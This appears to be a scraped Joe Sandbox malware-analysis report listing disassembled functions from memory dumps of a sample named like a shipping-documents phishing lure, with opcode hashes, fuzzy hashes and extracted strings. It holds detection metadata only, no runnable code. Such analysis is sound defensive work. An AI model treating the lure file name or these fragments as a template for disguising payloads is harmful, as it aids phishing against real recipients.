Opcode ID: 8f30caf75d14892adfc3b669019705a0768a9ae204943d956bafd0591a9f02d2
Instruction ID: 1f5f1077a251cbd3a8682ce2b33b7a443847bba6ac9d3d59b8f9f1a1f6fca67a
Opcode Fuzzy Hash: 8f30caf75d14892adfc3b669019705a0768a9ae204943d956bafd0591a9f02d2
Instruction Fuzzy Hash: B741C278E00218DFEF54EFA4D9959AEBBB6EF89300F208019D819AB756DA345D41CF60

Function 0A15BC70 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

Haq, xrefs: 0A15BCCE

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: ffb80e8ff48e9d28c446316ab687410073219e8f1bed38929dc8a2447b23fc31
Instruction ID: 851c9fdf1be6d9b6f30dfca5ce3212c79f6e29cccb51f59e6ac4cb6138815b7f
Opcode Fuzzy Hash: ffb80e8ff48e9d28c446316ab687410073219e8f1bed38929dc8a2447b23fc31
Instruction Fuzzy Hash: 5331E431608244DFD749DF78C860A6E7FB6FF86301F1580AAD8058B2A2DF359D46C761

Function 06A928C6 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

`\, xrefs: 06A9293C

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: `\
API String ID: 0-3053625064
Opcode ID: e0a1d7af5bf60c4f470f1768cf9d895722c5b0f9f17983a182c26df361aba273
Instruction ID: 2e3eb24afedb0b072f338809aadaa4ed66cd62b53f4d3f7ee89c333f97c57b3f
Opcode Fuzzy Hash: e0a1d7af5bf60c4f470f1768cf9d895722c5b0f9f17983a182c26df361aba273
Instruction Fuzzy Hash: 91418D74904215DFDB50EF68D584B9D7BF9FB49300F2095A5E10AEB256CB309E84CF60

Function 06A92939 Relevance: 1.3, Strings: 1, Instructions: 91COMMON

Download Yara Rule

Strings

`\, xrefs: 06A9293C

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: `\
API String ID: 0-3053625064
Opcode ID: d85ab3b57063a4d8c1fb699d675f7f307be092db1a4d3143478b6380c712272e
Instruction ID: 29ef64448954fa3ea4c59fe1aea4ab15686ecccef6a9f307a2adbf41d87396c9
Opcode Fuzzy Hash: d85ab3b57063a4d8c1fb699d675f7f307be092db1a4d3143478b6380c712272e
Instruction Fuzzy Hash: BF414A74904215DFDB50EF68D584B9D7BF9FB49300F1095A5D10AEB256DB30AE84CF60

Function 044D5D08 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

8aq, xrefs: 044D5D6E

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: 8aq
API String ID: 0-538729646
Opcode ID: fe60334e74ba4b62c8d79b6eef62ab0a39df591e9da5308ba6bb58b0eaa97851
Instruction ID: 79629feb3435b680e36587914ea6457631294fa4c6b4abd97a660af3fb37e361
Opcode Fuzzy Hash: fe60334e74ba4b62c8d79b6eef62ab0a39df591e9da5308ba6bb58b0eaa97851
Instruction Fuzzy Hash: 8F115471B00109EBDF10EF68E5687EEBBB1EB84390F104067C003AB258EF71B90686B0

Function 06A97FB8 Relevance: 1.3, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

nl~, xrefs: 06A9801F

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: nl~
API String ID: 0-3755660440
Opcode ID: 2e84ec85bed14dd1faa74277ad0c2c0240b5f8a5cd910b888cba71f4a5574eec
Instruction ID: dafb63887328d48973fdb16b5e72620cf607f82037a4ee1e161daa04da126bba
Opcode Fuzzy Hash: 2e84ec85bed14dd1faa74277ad0c2c0240b5f8a5cd910b888cba71f4a5574eec
Instruction Fuzzy Hash: 8A11AC75D052199FDF50EFA4D4056FEBBF9EB4A304F20406AC116B7281DB390A44CBB0

Function 044DEEA6 Relevance: 1.3, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

4']q, xrefs: 044DEF59

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: c1784ef0ebf028f7f066fb337dc239b20663cf91041eda6720d17a66e80a4629
Instruction ID: 4d8b75df7d46fcc067a481f42636ae447e8e960220ee1d39bbe35156f01a80df
Opcode Fuzzy Hash: c1784ef0ebf028f7f066fb337dc239b20663cf91041eda6720d17a66e80a4629
Instruction Fuzzy Hash: 7721BE30E01208EFDB14EFB8E58968DBFF5EF85300F2045A9D405EB245DB30AA46CB41

Function 06A92B34 Relevance: 1.3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

w9@{, xrefs: 06A92AE9

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: w9@{
API String ID: 0-3417865879
Opcode ID: 8f04ed4a44846a1e76fc71ccae8270aecbc79141f556750653c449b7befa1e19
Instruction ID: 1a81c5d09329dd68001742fb256de4ccafc741e544d18658c025616e24993dd2
Opcode Fuzzy Hash: 8f04ed4a44846a1e76fc71ccae8270aecbc79141f556750653c449b7befa1e19
Instruction Fuzzy Hash: 7F210CB4E002189FEB34DFA4D5455ADBBFAFB89300B206529D60AABB56DB745801CF70

Function 044D5D18 Relevance: 1.3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

8aq, xrefs: 044D5D6E

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: 8aq
API String ID: 0-538729646
Opcode ID: 37945a5aa41a51d4d0d2926e939d2eb500614ec161d0e0f5c7804f019acb6050
Instruction ID: 194d882099dbfe5866335094c7c854885619baed527bc4220fa6d6d48e8a66ff
Opcode Fuzzy Hash: 37945a5aa41a51d4d0d2926e939d2eb500614ec161d0e0f5c7804f019acb6050
Instruction Fuzzy Hash: 4C11C130A01259ABEF14EF68D9287EEBBF1AF89340F004066C042B7284DF79A905D7B1

Function 044DEF28 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

4']q, xrefs: 044DEF59

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 1a06394fb372364c03aac4ffec82eb3306b7c6f6450f317483cb8a67192b228c
Instruction ID: ed5308ac6ebf3ff9f8d6f953324a2e3648c33bc150039ea9374d5ae3ac426002
Opcode Fuzzy Hash: 1a06394fb372364c03aac4ffec82eb3306b7c6f6450f317483cb8a67192b228c
Instruction Fuzzy Hash: CAF06930A00309EFCB48FFB8E548A8DBFF4FB84600B1041A9D806E7215EE34AB44CB42

Function 0A155F9A Relevance: .7, Instructions: 654COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ed3cb23c211bb62c23560e106b58a8e1d6581d43b404e1514d6a8caea1253a5
Instruction ID: 98e88fb3e23685281a4ac7729a82c19ec6cb56755d32b710aa5f60282161ae7a
Opcode Fuzzy Hash: 9ed3cb23c211bb62c23560e106b58a8e1d6581d43b404e1514d6a8caea1253a5
Instruction Fuzzy Hash: 7B12A7770213679FD2143F25F6BD1AABA65FF2F323714BC40E66BC84158B7448C99A24

Function 0A155FA8 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 940ae571d96157631e3282c95eb2b5e3359261f09b49752a3e6edce41c4594ab
Instruction ID: 45b3f7887173638c82b2453450c5220c80a37e61bbacd34f0779f80bac004d76
Opcode Fuzzy Hash: 940ae571d96157631e3282c95eb2b5e3359261f09b49752a3e6edce41c4594ab
Instruction Fuzzy Hash: 261297771213679FD2143F25F6BD1AABA65FF2F323704BC40E66BC84158B7448C99A28

Function 044DB31C Relevance: .3, Instructions: 336COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f721dd22be7dd78ad9a64d10e622a9850183f50ca8d1631ea300ce0e7c39d85
Instruction ID: 09949c712267882bfb92d24b4a0cfcbd1bef90481e126826620d9d13e7f6cf63
Opcode Fuzzy Hash: 6f721dd22be7dd78ad9a64d10e622a9850183f50ca8d1631ea300ce0e7c39d85
Instruction Fuzzy Hash: 78D16130A01605DFDF54DFA9D894AAEB7B1FF89314F6045AAE405AB3A1CB35EC81CB50

Function 0A15BE08 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9d13bd1d8072d7a5eaf59eb382ce6055d10c0614525395ce515d247b697f51c
Instruction ID: a7d49feaec95b289918a065b2150bd8f89c00776b2a0a51b316b959171357b2c
Opcode Fuzzy Hash: d9d13bd1d8072d7a5eaf59eb382ce6055d10c0614525395ce515d247b697f51c
Instruction Fuzzy Hash: 87710676A08205DFC714DFB8D8549AABBF6FFC5324B15852AE829DB351E731D801CBA0

Function 044DE630 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 827b9d090cd12d36505d0cf4a94bc17caeb37fc063e8672d6385ca2e51b69599
Instruction ID: 3f423ef9b560720a0beea22317b67eef5f66f1165d5e273f8ae228f3dcb5b52e
Opcode Fuzzy Hash: 827b9d090cd12d36505d0cf4a94bc17caeb37fc063e8672d6385ca2e51b69599
Instruction Fuzzy Hash: 77A1E534A01A05DFDF54DFA9D894A9EB7B2FF48314F6141AAE805AB3A1C731EC81CB50

Function 0A150040 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92467491adb42228f508bcab239f092d40f98c45b7efc3684bdca3f6d6354343
Instruction ID: 1c576fd5e424caaada21463df84ffdb8f980f45b409dde428232f956724a1ca9
Opcode Fuzzy Hash: 92467491adb42228f508bcab239f092d40f98c45b7efc3684bdca3f6d6354343
Instruction Fuzzy Hash: 7571F434710605CFCB65DFB9C898A6A7BE9AF4D300F1640A9E826CB3A1DB75DC41CB91

Function 06A9E358 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb2caebc9fa4798c6ac1d2db568d067ae5ebc9281b5fa1b22e61401aa6e4fb34
Instruction ID: 9386aa5b04eb64a4e2166607f90e227b42d63f938b4349aab116277972e26879
Opcode Fuzzy Hash: cb2caebc9fa4798c6ac1d2db568d067ae5ebc9281b5fa1b22e61401aa6e4fb34
Instruction Fuzzy Hash: 19618B357002118FDB94AF39C55473A7AE6BF88351F248469E446CB3A6EE35CC42CBA1

Function 044D4788 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 141560a961efcc8dde650e9b801a0cf38619adb5c32f1007915888dbc806a908
Instruction ID: 1da5e3f20e8fbdfed29bbecf142d63b2fbfdba9b8e71735a732628a69e0aecbc
Opcode Fuzzy Hash: 141560a961efcc8dde650e9b801a0cf38619adb5c32f1007915888dbc806a908
Instruction Fuzzy Hash: 3181AF74E412299FDB65DF29D990BEDBBF2BB89300F1080EAD948A7254DB305E81CF45

Function 044D4498 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2219cb2fcc579fce429a4796fca8fe07cc96c46f9207255a182e400f22ab17d7
Instruction ID: 38ad0bd635f88e640cb5aa14dd3ddd5f999d9d5bd45ac333837bb74c9ebfcf7e
Opcode Fuzzy Hash: 2219cb2fcc579fce429a4796fca8fe07cc96c46f9207255a182e400f22ab17d7
Instruction Fuzzy Hash: 1971E274E00208DFDB04EFA9D99069DBBF2BF89300F20852AD815BB359DB35A946CF50

Function 06A98D60 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f288c4f09c7bb927e98914b7b1362ff14db3094e2b7c8120bd606d613fce6b
Instruction ID: cbde1a8475f2bc8fa8db49a17b23238dc6ec609bc7de4a4aaf741380a48164e8
Opcode Fuzzy Hash: 90f288c4f09c7bb927e98914b7b1362ff14db3094e2b7c8120bd606d613fce6b
Instruction Fuzzy Hash: B051F8B4E05219CFDB44DFA9C5909AEFBF6FF8A300F249915D419A7246C734A941CBA0

Function 0A1572B0 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b8f75c0d1e1dfa973ab0e0116df637a4ec4bdc76d5e6fe9292ba5d9a933f486
Instruction ID: 73a7e29e322bbe4d26f7e3e59e9c3d3be05e25dd1892bcc6f904229bbbb178e9
Opcode Fuzzy Hash: 1b8f75c0d1e1dfa973ab0e0116df637a4ec4bdc76d5e6fe9292ba5d9a933f486
Instruction Fuzzy Hash: 91611074D00318CFDB14DFA5D984AADBBB2FF88304F208529D819AB395DB399A46CF41

Function 06A98140 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a4f8888ef8a06586d666544a145fdc580489bd8555afca6c0b255311590cc50
Instruction ID: 1ea3ebea61104d7053e4d1a3b425f9d002a4c5061d2e18364ab3452e083096b5
Opcode Fuzzy Hash: 3a4f8888ef8a06586d666544a145fdc580489bd8555afca6c0b255311590cc50
Instruction Fuzzy Hash: 84518F74D093489FCB41EFB4D8459AEBFF4EF46301F2081EAD454E7252DA385A40CBA2

Function 06A96A50 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd3083aa636dbf4a228be5b172ffad5e3bdf990d13bdbe1c708d184556e050f0
Instruction ID: 4180b472b99f7860573654ab7f1004a2614ac3bf472e35f07dd2ea37ee9628cf
Opcode Fuzzy Hash: fd3083aa636dbf4a228be5b172ffad5e3bdf990d13bdbe1c708d184556e050f0
Instruction Fuzzy Hash: 3E411674D89218CFFF44EFA5D5446FDBBF9AF4A300F24B025E009A7242EB385945CAA4

Function 0A155567 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12471d9cbff0a7bc70a976f3a8afbc4e9c95a113dbcabd5cffc73cba93f06582
Instruction ID: 22079501ddd2208c683dc560a1c2931b67770e0cc8798213b5167ac8248fd63f
Opcode Fuzzy Hash: 12471d9cbff0a7bc70a976f3a8afbc4e9c95a113dbcabd5cffc73cba93f06582
Instruction Fuzzy Hash: 7C518374E01218DFDB54DFA9D58499DBBF2FF89310F20816AE819AB365DB31A901CF50

Function 06A9C860 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cf3e60be39c1e2d93c378d1776508ea46df384c2b2a671e0c15e544f599d6e6
Instruction ID: b6dfab5b17f3e0528b45448f7d594b3f0afcb4ebbf849652b6c156156b285c47
Opcode Fuzzy Hash: 6cf3e60be39c1e2d93c378d1776508ea46df384c2b2a671e0c15e544f599d6e6
Instruction Fuzzy Hash: 36517374E01208CFCB48DFA9D98499DBBF2FF89310B209169E815BB365DB35A942CF50

Function 0A155578 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b2fe9d502df7a21fdc1e91000a5019fa6b5fc0e9cb3ff7040b7848fb4787727
Instruction ID: 342f8d8baca93ca91c36a04f8efd765626801585d08d491ee6cb8ed0ddb0c077
Opcode Fuzzy Hash: 2b2fe9d502df7a21fdc1e91000a5019fa6b5fc0e9cb3ff7040b7848fb4787727
Instruction Fuzzy Hash: 88517374E01218DFDB58DFA9D58499DBBF2FF89310F208169E819AB365DB31A901CF50

Function 0A1580C1 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5de4da028b44cc6c0ec69673b5f927ccd990ee64b2765a087a56b294b04d8e9
Instruction ID: 8d6b3af6c8f93b348ce7393f4c21fc2b2e441263e2c3fcffd1a15af4290ec1ca
Opcode Fuzzy Hash: c5de4da028b44cc6c0ec69673b5f927ccd990ee64b2765a087a56b294b04d8e9
Instruction Fuzzy Hash: A151CE74E02228CFCB64DF64C984BEDBBB1BB89301F1055AAD409AB361D735AE85DF50

Function 0A152263 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c683f137664b7bc095e024f099dc238cd93915e4c2f15347cd68c794f49e76f9
Instruction ID: 907c6f65a68aa155c262a97cba2f94557484b2649f9caf704bd3c39847c317c5
Opcode Fuzzy Hash: c683f137664b7bc095e024f099dc238cd93915e4c2f15347cd68c794f49e76f9
Instruction Fuzzy Hash: DC417B36A04249DFCF15CFA4C844ADEBFB2AF4A350F058165EC25AB2A5D330E954CBA0

Function 06A9E068 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae1dda54b4689ce98115222e2155da1c0baab6ba441bb2377d1331b6135ecb13
Instruction ID: 1ca9d69a233d61bd8eef77ad4883cbebf5997ce195b6c19cf4d223db7bd41b21
Opcode Fuzzy Hash: ae1dda54b4689ce98115222e2155da1c0baab6ba441bb2377d1331b6135ecb13
Instruction Fuzzy Hash: 6831F2357042059FDB45EF29D854A6E3BE6FF8A200B2440A9F506CF3A2DF25DC41CBA0

Function 044D6BC8 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32155558b7cf70efd37ca0a7a7f424c6d79f7fa56413c2441ed2d2ef1dba60a6
Instruction ID: fcfdc92a267b1717dc638038f05ee32494164ba3170e0f358a373b68bb502845
Opcode Fuzzy Hash: 32155558b7cf70efd37ca0a7a7f424c6d79f7fa56413c2441ed2d2ef1dba60a6
Instruction Fuzzy Hash: 4C41BE75E01218DFDB14DFA9D5946EEBBF2BF49300F10902AD419A7398EB34AA46CF50

Function 044D6BB8 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 332bfd5c65bccc51ca9e387f044f3c3358d19991985af03baa8616c882f8f2c5
Instruction ID: e96e7246137d1e1b7f0de031a4bfcecd41c8a377ad6ffc0ee4193cde0c9f6efb
Opcode Fuzzy Hash: 332bfd5c65bccc51ca9e387f044f3c3358d19991985af03baa8616c882f8f2c5
Instruction Fuzzy Hash: 7341D075D01218DFDB14EFA8E5946DEBBF1BB49300F10912AD415A7398DB346A46CF50

Function 06A96A40 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 964f321c8caadc76d3ca8985eec6ff1aac3008b88bfa5f99505e91eb3c1ea3ff
Instruction ID: a1a7732de4ef8da9b0a73fdf6384e800d55371a6129e355bd1907770656e135e
Opcode Fuzzy Hash: 964f321c8caadc76d3ca8985eec6ff1aac3008b88bfa5f99505e91eb3c1ea3ff
Instruction Fuzzy Hash: 07315A74C49218CFFF84EF65D5452EDBBFAAF8A300F24B029E409A7256EB344545CBA0

Function 06A9D910 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86e4481c49ee6a76d37891f49cfaced5d8584f92ca0561e3a15be98ad42edc56
Instruction ID: 06a4f9d075ffe09e6c2660c828fb1bae2812cb4b66ffc308b9865789f53af200
Opcode Fuzzy Hash: 86e4481c49ee6a76d37891f49cfaced5d8584f92ca0561e3a15be98ad42edc56
Instruction Fuzzy Hash: AA318F3260560A9FDF41BF68D850AAE7FE6EF89310F108025F9059B651CB34D9A1CBA1

Function 06A990D8 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f766a850f4fb97b7c1d912af6b53dd5db971afab82f2b15a2479f61ed6c6ebe
Instruction ID: fa88ab103884721209ad015891ca0db5d92670527ca46d83da5d255fa41272cb
Opcode Fuzzy Hash: 8f766a850f4fb97b7c1d912af6b53dd5db971afab82f2b15a2479f61ed6c6ebe
Instruction Fuzzy Hash: 0A311D74D05208DFEF44DFA6D4456EEBBFABF89300F249029E805A3255DB345946CF60

Function 0A153268 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dbba453e304ff112d650df57ecbc73b0c7ba80025ee62eb5d026025937bbe8f
Instruction ID: 16cd89911eb54e19fc144b3e65f23c8a8d7f83fd2877f1b284f3a9047b9456e5
Opcode Fuzzy Hash: 8dbba453e304ff112d650df57ecbc73b0c7ba80025ee62eb5d026025937bbe8f
Instruction Fuzzy Hash: 663181367002049FDB089F69D854BAE7BEAFB8C310F148069E916DB391CF349C06CB94

Function 044D4488 Relevance: .1, Instructions: 96COMMON

